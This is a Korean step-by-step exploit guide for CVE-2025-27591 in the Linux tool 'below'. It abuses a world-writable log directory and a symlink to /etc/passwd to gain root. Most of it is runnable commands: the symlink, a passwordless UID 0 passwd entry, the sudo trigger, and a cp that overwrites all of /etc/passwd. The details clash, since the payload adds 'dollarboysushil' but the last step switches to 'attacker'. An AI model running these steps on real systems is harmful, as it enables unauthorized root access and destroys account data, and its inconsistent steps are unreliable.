
CVE-2025-27591은 Below 서비스(버전 < v0.9.0)에서 알려진 권한 상승 취약점입니다.
below의 쓰기 가능한 심볼릭 링크를 통한 권한 상승이 문서는 CVE-2025-27591, below Linux 시스템 모니터링 도구의 로컬 권한 상승 취약점에 대한 간단한 익스플로잇입니다. 이 취약점은 v0.9.0 이전 버전에 영향을 미치며, 시스템의 잘못된 권한 할당에서 비롯됩니다. 이 문제는 2025년 1월에 발견되었고 2025년 3월 12일에 (SecurityOnline, OpenWall)로 공개되었습니다. below가 sudo로 실행되면 오류를 world-writable 디렉토리(/var/log/below)에 기록할 수 있으며, 공격자는 로그 파일을 /etc/passwd와 같은 민감한 대상에 심볼릭 링크할 수 있습니다.
이를 악용하면 below에 대한 sudo 접근 권한이 있는 비특권 사용자가 root로 권한을 상승시킬 수 있습니다.
belowbelow record를 통한 로깅/var/log/below/error_root.log/var/log/below 디렉토리가 world-writable 상태입니다sudo /usr/bin/below record를 실행할 수 있습니다✅ 1단계: world-writable 로그 디렉토리 확인 다음과 같이 표시되어야 합니다:
drwxrwxrwx 2 root root 4096 ... /var/log/below

✅ 2단계: 기존 error_root.log 제거
rm -f /var/log/below/error_root.log
✅ 3단계: /etc/passwd에 대한 심볼릭 링크 생성
ln -s /etc/passwd /var/log/below/error_root.log
그런 다음 다음 명령으로 확인합니다
ls -la /var/log/below/error_root.log
# should show: error_root.log -> /etc/passwd

✅ 4단계: 페이로드 파일 생성 이것은 비밀번호가 없는 새로운 root 사용자 attacker를 추가합니다:
echo 'dollarboysushil::0:0:dollarboysusil:/root:/bin/bash' > /tmp/payload
파일 구조
username:password:UID:GID:comment(home/full name):home_directory:shell
여기서 핵심은 UID와 GUID입니다.
UID와 GUID를 0으로 설정하여 사용자를 root 사용자로 만들고 그룹 ID를 root 그룹으로 설정합니다.

✅ 5단계: root로 로그 쓰기 트리거 이것이 익스플로잇의 핵심입니다.
sudo /usr/bin/below record
이 명령은 실패하거나 시간 초과가 발생할 것으로 예상되지만, 실제로는 /etc/passwd인 /var/log/below/error_root.log에 오류 로그를 쓰려고 시도합니다.
💡 경우에 따라 이 작업만으로도 /etc/passwd가 손상될 수 있으므로, 다음 단계에서 완전히 덮어씁니다.
✅ 6단계: 심볼릭 링크를 통해 /etc/passwd 덮어쓰기
cp /tmp/payload /var/log/below/error_root.log

✅ 7단계: root 되기
su attacker
비밀번호 없이 root 셸에 진입하게 됩니다.

python3 dbs_exploit.py
